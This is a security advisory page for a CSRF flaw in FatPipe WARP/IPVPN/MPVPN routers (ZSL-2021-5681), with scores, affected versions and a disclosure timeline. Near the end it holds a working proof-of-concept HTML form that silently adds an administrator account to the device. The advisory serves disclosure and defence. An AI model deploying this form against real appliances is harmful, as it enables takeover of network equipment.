8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
8.9 High
AI Score
Confidence
High
9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
0.056 Low
EPSS
Percentile
93.1%
Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 CSRF Add Admin Exploit
Advisory ID: ZSL-2021-5681
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (4/5)
Release Date: 27.09.2021
FatPipe Networks invented the concept of router-clustering, which provides the highest level of reliability, redundancy, and speed of Internet traffic for Business Continuity and communications. FatPipe WARP achieves fault tolerance for companies by creating an easy method of combining two or more Internet connections of any kind over multiple ISPs. FatPipe utilizes all paths when the lines are up and running, dynamically balancing traffic over the multiple lines, and intelligently failing over inbound and outbound IP traffic when ISP services and/or components fail.
FatPipe IPVPN balances load and provides reliability among multiple managed and CPE based VPNs as well as dedicated private networks. FatPipe IPVPN can also provide you an easy low-cost migration path from private line, Frame or Point-to-Point networks. You can aggregate multiple private, MPLS and public networks without additional equipment at the provider’s site.
FatPipe MPVPN, a patented router clustering device, is an essential part of Disaster Recovery and Business Continuity Planning for Virtual Private Network (VPN) connectivity. It makes any VPN up to 900% more secure and 300% times more reliable, redundant and faster. MPVPN can take WANs with an uptime of 99.5% or less and make them 99.999988% or higher, providing a virtually infallible WAN. MPVPN dynamically balances load over multiple lines and ISPs without the need for BGP programming. MPVPN aggregates up to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed you need to keep your VPN up and running despite failures of service, line, software, or hardware.
The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
FatPipe Networks Inc. - <https://www.fatpipeinc.com>
WARP / IPVPN / MPVPN
10.2.2r38
10.2.2r25
10.2.2r10
10.1.2r60p82
10.1.2r60p71
10.1.2r60p65
10.1.2r60p58s1
10.1.2r60p58
10.1.2r60p55
10.1.2r60p45
10.1.2r60p35
10.1.2r60p32
10.1.2r60p13
10.1.2r60p10
9.1.2r185
9.1.2r180p2
9.1.2r165
9.1.2r164p5
9.1.2r164p4
9.1.2r164
9.1.2r161p26
9.1.2r161p20
9.1.2r161p17
9.1.2r161p16
9.1.2r161p12
9.1.2r161p3
9.1.2r161p2
9.1.2r156
9.1.2r150
9.1.2r144
9.1.2r129
7.1.2r39
6.1.2r70p75-m
6.1.2r70p45-m
6.1.2r70p26
5.2.0r34
Apache-Coyote/1.1
[30.05.2016] Vulnerability discovered.
[25.07.2021] Vulnerability discovered.
[25.07.2021] Vendor contacted.
[27.07.2021] No response from the vendor.
[28.07.2021] Vendor contacted.
[06.08.2021] No response from the vendor.
[07.08.2021] Vendor contacted.
[09.08.2021] CISA contacted.
[09.08.2021] CISA asks for more details.
[09.08.2021] Sent details to CISA.
[10.08.2021] CISA asked if the vulnerabilities were previously reported and which contacts did ZSL used initially.
[10.08.2021] Replied to CISA.
[10.08.2021] CISA will reach out to the vendor.
[16.08.2021] Asked CISA for status update.
[17.08.2021] CISA responds that the vendor replied and is reviewing the information.
[17.08.2021] CISA responds, vendor pushed updates to address the reported issues.
[17.08.2021] Replied to CISA, asked for patch release plan and coordination of advisory release.
[18.08.2021] Working with CISA and FatPipe.
[20.08.2021] Vendor released advisory: https://www.fatpipeinc.com/support/advisories.php
[23.08.2021] Working with the vendor.
[24.08.2021] Sent draft advisories to vendor. Asked for fixed version number. Informed that the advisories will be released mid September.
[25.08.2021] Asked vendor for confirmation of PoCs receipt.
[30.08.2021] Further discussion with the vendor about the vulnerabilities.
[07.09.2021] Asked vendor for status update.
[10.09.2021] Vendor requests more details.
[10.09.2021] Provided further details to the vendor.
[14.09.2021] Informed the vendor that advisories will be released 27th September.
[19.09.2021] Informed CISA about our release plan.
[27.09.2021] Coordinated public security advisory released.
[27.09.2021] Vendor provides fixed versions 10.1.2r60p92 and 10.2.2r43, and for 9.1.2: 9.1.2r161p31 and 9.1.2r180p9.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <https://www.fatpipeinc.com/support/advisories.php>
[2] <https://www.exploit-db.com/exploits/50338>
[3] <https://packetstormsecurity.com/files/164319/>
[4] <https://cxsecurity.com/issue/WLB-2021090149>
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/210325>
[6] <https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/2791320/nsa-cisa-release-guidance-on-selecting-and-hardening-remote-access-vpns/>
[7] <https://www.fatpipeinc.com/support/cve-list.php>
[8] <https://thehackernews.com/2021/11/fbi-issues-flash-alert-on-actively.html>
[9] <https://www.ic3.gov/Media/News/2021/211117-2.pdf>
[10] <https://threatpost.com/fbi-fatpipe-vpn-zero-day-exploited-apt/176453/>
[11] <https://cisomag.eccouncil.org/fatpipe-mpvpn-zero-day-vulnerability-exploited/>
[12] <https://www.securityweek.com/fbi-warns-actively-exploited-fatpipe-zero-day-vulnerability>
[13] <https://vulners.com/cve/CVE-2021-27860>
[14] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27859>
[15] <https://www.fatpipeinc.com/fpsa/fpsa005.php>
[27.09.2021] - Initial release
[30.09.2021] - Added reference [2], [3], [4], [5] and [6]
[21.11.2021] - Added reference [7], [8], [9], [10], [11] and [12]
[14.12.2021] - Added reference [13]
[11.01.2022] - Added reference [14]
[01.02.2022] - Added reference [15]
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<!--
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 CSRF Add Admin Exploit
Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP / IPVPN / MPVPN
10.2.2r38
10.2.2r25
10.2.2r10
10.1.2r60p82
10.1.2r60p71
10.1.2r60p65
10.1.2r60p58s1
10.1.2r60p58
10.1.2r60p55
10.1.2r60p45
10.1.2r60p35
10.1.2r60p32
10.1.2r60p13
10.1.2r60p10
9.1.2r185
9.1.2r180p2
9.1.2r165
9.1.2r164p5
9.1.2r164p4
9.1.2r164
9.1.2r161p26
9.1.2r161p20
9.1.2r161p17
9.1.2r161p16
9.1.2r161p12
9.1.2r161p3
9.1.2r161p2
9.1.2r156
9.1.2r150
9.1.2r144
9.1.2r129
7.1.2r39
6.1.2r70p75-m
6.1.2r70p45-m
6.1.2r70p26
5.2.0r34
Summary: FatPipe Networks invented the concept of router-clustering,
which provides the highest level of reliability, redundancy, and speed
of Internet traffic for Business Continuity and communications. FatPipe
WARP achieves fault tolerance for companies by creating an easy method
of combining two or more Internet connections of any kind over multiple
ISPs. FatPipe utilizes all paths when the lines are up and running,
dynamically balancing traffic over the multiple lines, and intelligently
failing over inbound and outbound IP traffic when ISP services and/or
components fail.
FatPipe IPVPN balances load and provides reliability among multiple
managed and CPE based VPNs as well as dedicated private networks. FatPipe
IPVPN can also provide you an easy low-cost migration path from private
line, Frame or Point-to-Point networks. You can aggregate multiple private,
MPLS and public networks without additional equipment at the provider's
site.
FatPipe MPVPN, a patented router clustering device, is an essential part
of Disaster Recovery and Business Continuity Planning for Virtual Private
Network (VPN) connectivity. It makes any VPN up to 900% more secure and
300% times more reliable, redundant and faster. MPVPN can take WANs with
an uptime of 99.5% or less and make them 99.999988% or higher, providing
a virtually infallible WAN. MPVPN dynamically balances load over multiple
lines and ISPs without the need for BGP programming. MPVPN aggregates up
to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
you need to keep your VPN up and running despite failures of service, line,
software, or hardware.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5681
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5681.php
30.05.2016
25.07.2021
--><html>
<body>
<form action="https://10.0.0.7/fpui/userServlet?loadType=set&block=userSetRequest" method="POST">
<input name="userList" type="hidden" value='[{"userName":"adminz","privilege":"1","password":"TestPwd17","action":"add","state":false}]'/>
<input type="submit" value="Submit"/>
</form>
</body>
</html>
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
8.9 High
AI Score
Confidence
High
9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
0.056 Low
EPSS
Percentile
93.1%